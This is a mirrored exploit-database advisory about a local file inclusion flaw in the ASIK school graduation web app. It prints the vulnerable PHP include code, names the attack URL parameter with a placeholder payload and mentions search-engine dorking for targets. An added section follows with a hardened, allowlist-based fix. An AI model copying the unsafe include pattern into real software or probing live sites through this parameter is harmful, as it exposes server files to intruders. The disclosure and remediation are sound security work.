Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019040109

Below is a copy:

Aplikasi Sistem Informasi Kelulusan [ASIK] LFI Vulnerability
====================================================================================================================================
| # Title     : Aplikasi Sistem Informasi Kelulusan [ASIK] LFI Vulnerability                                                       |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             |
| # Vendor    : http://lulus.smkn2purwokerto.sch.id/admin.zip                                                                      |  
| # Dork      :                                                                                                                    |
====================================================================================================================================

poc :


[+] Dorking in Google or other search engine.

[+]       <?php

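require "config.php";
error_reporting(E_ALL ^ (E_NOTICE | E_WARNING));

// User-controlled value taken from the query string without validation
$page = $_GET['page'];
$filename = "content/$page.php";

if (!file_exists($filename)) {
    include "content/home.php";
} else {
    // $page is interpolated into the include path unfiltered
    @include "content/$page.php";
}
?>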

[+] LFI : /index.php?page= [Ev!l]
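
Added example (not part of the original advisory or of the ASIK code base): a hardened form of the include logic above, which accepts only names of files that actually ship in content/ instead of interpolating $_GET['page'] into the path. The function name resolve_page and the flat content/ layout are assumptions.

```php
<?php
// Added example: hardened page router for the snippet shown in the advisory.
// Assumptions: page names are simple identifiers and every page lives
// directly in content/ as <name>.php (the layout the snippet implies).
require "config.php";

/**
 * Map a user-supplied page name to a file inside content/, or fall back
 * to the home page when the name is not acceptable.
 * resolve_page() is a hypothetical helper, not a function of the project.
 */
function resolve_page($requested, string $contentDir): string
{
    $home = $contentDir . DIRECTORY_SEPARATOR . 'home.php';

    // Reject arrays (?page[]=x) and anything but a short plain identifier.
    // The pattern excludes "/", "\", ".", ":" and NUL bytes.
    if (!is_string($requested) || !preg_match('/\A[a-z0-9_-]{1,64}\z/', $requested)) {
        return $home;
    }

    // Allowlist built from the files actually present in content/.
    $allowed = array_map(
        function ($f) { return basename($f, '.php'); },
        glob($contentDir . DIRECTORY_SEPARATOR . '*.php') ?: []
    );
    if (!in_array($requested, $allowed, true)) {
        return $home;
    }

    // Defence in depth: the resolved path must still sit in content/
    // (this also rejects symlinks that point outside the directory).
    $base = realpath($contentDir);
    $path = realpath($contentDir . DIRECTORY_SEPARATOR . $requested . '.php');
    if ($base === false || $path === false || dirname($path) !== $base) {
        return $home;
    }
    return $path;
}

$page = $_GET['page'] ?? 'home';
include resolve_page($page, __DIR__ . '/content');
```

Dropping the @ error suppression on include lets a failed or unexpected include appear in the server log, which helps detection.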




Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
                                                                                                                                      |
=======================================================================================================================================

Copyright ©2019 Exploitalert.
